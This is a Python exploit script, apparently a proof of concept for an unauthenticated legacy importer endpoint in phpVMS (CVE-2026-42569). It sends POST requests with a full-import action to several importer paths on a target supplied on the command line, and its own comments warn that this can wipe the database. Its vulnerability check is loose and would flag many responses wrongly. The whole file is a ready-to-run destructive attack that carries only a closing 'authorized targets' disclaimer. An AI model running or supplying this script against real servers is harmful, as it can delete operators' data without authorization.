#!/usr/bin/env python3
"""
CVE-2026-42569 - phpVMS Unauthenticated Import Endpoint Bypass
Full Exploit PoC (Database Wipe Risk)
Author : Ashraf Zaryouh / @xBlackash
"""

import requests
import sys
import time
from colorama import init, Fore, Style

init(autoreset=True)

def banner():
    print(f"""{Fore.RED}
╔══════════════════════════════════════════════════════════════╗
║                 CVE-2026-42569 - phpVMS RCE/Destructive     ║
║          Unauthenticated Legacy Importer Access             ║
╚══════════════════════════════════════════════════════════════╝{Style.RESET_ALL}""")

def exploit(target):
    print(f"{Fore.CYAN}[*] Targeting: {target}{Style.RESET_ALL}")
    
    # Legacy importer endpoints that should be protected
    endpoints = [
        "/importer",
        "/importer/index",
        "/import",
        "/legacy/importer"
    ]
    
    headers = {
        "User-Agent": "Mozilla/5.0 (CVE-2026-42569 PoC)",
        "Content-Type": "application/x-www-form-urlencoded"
    }

    for endpoint in endpoints:
        url = target.rstrip("/") + endpoint
        print(f"{Fore.YELLOW}[*] Testing: {url}{Style.RESET_ALL}")
        
        try:
            # Test with dangerous action (this can trigger wipe)
            data = {
                "action": "import",
                "type": "full",
                "confirm": "true"
            }
            
            r = requests.post(url, headers=headers, data=data, timeout=10, verify=False, allow_redirects=True)
            
            if r.status_code in [200, 301, 302] and ("success" in r.text.lower() or "imported" in r.text.lower() or len(r.text) > 100):
                print(f"{Fore.GREEN}[+] SUCCESS! Endpoint reachable: {endpoint}{Style.RESET_ALL}")
                print(f"{Fore.RED}[!!] Target is VULNERABLE to CVE-2026-42569{Style.RESET_ALL}")
                print(f"{Fore.RED}[!!] Database wipe / mass deletion is possible!{Style.RESET_ALL}")
                break
            else:
                print(f"{Fore.RED}[-] No success on {endpoint} (Status: {r.status_code}){Style.RESET_ALL}")
                
        except Exception as e:
            print(f"{Fore.RED}[-] Error on {endpoint}: {e}{Style.RESET_ALL}")

    print(f"\n{Fore.YELLOW}[!] If any endpoint responded positively, the system is vulnerable.{Style.RESET_ALL}")

if __name__ == "__main__":
    banner()
    
    if len(sys.argv) < 2:
        print("Usage: python3 CVE-2026-42569.py <http://target>")
        print("Example: python3 CVE-2026-42569.py http://phpvms.example.com")
        sys.exit(1)

    target = sys.argv[1]
    exploit(target)
    
    print(f"\n{Fore.RED}=== STRONG WARNING ==={Style.RESET_ALL}")
    print("This vulnerability can cause COMPLETE DATABASE DELETION.")
    print("Use responsibly and only on authorized targets.")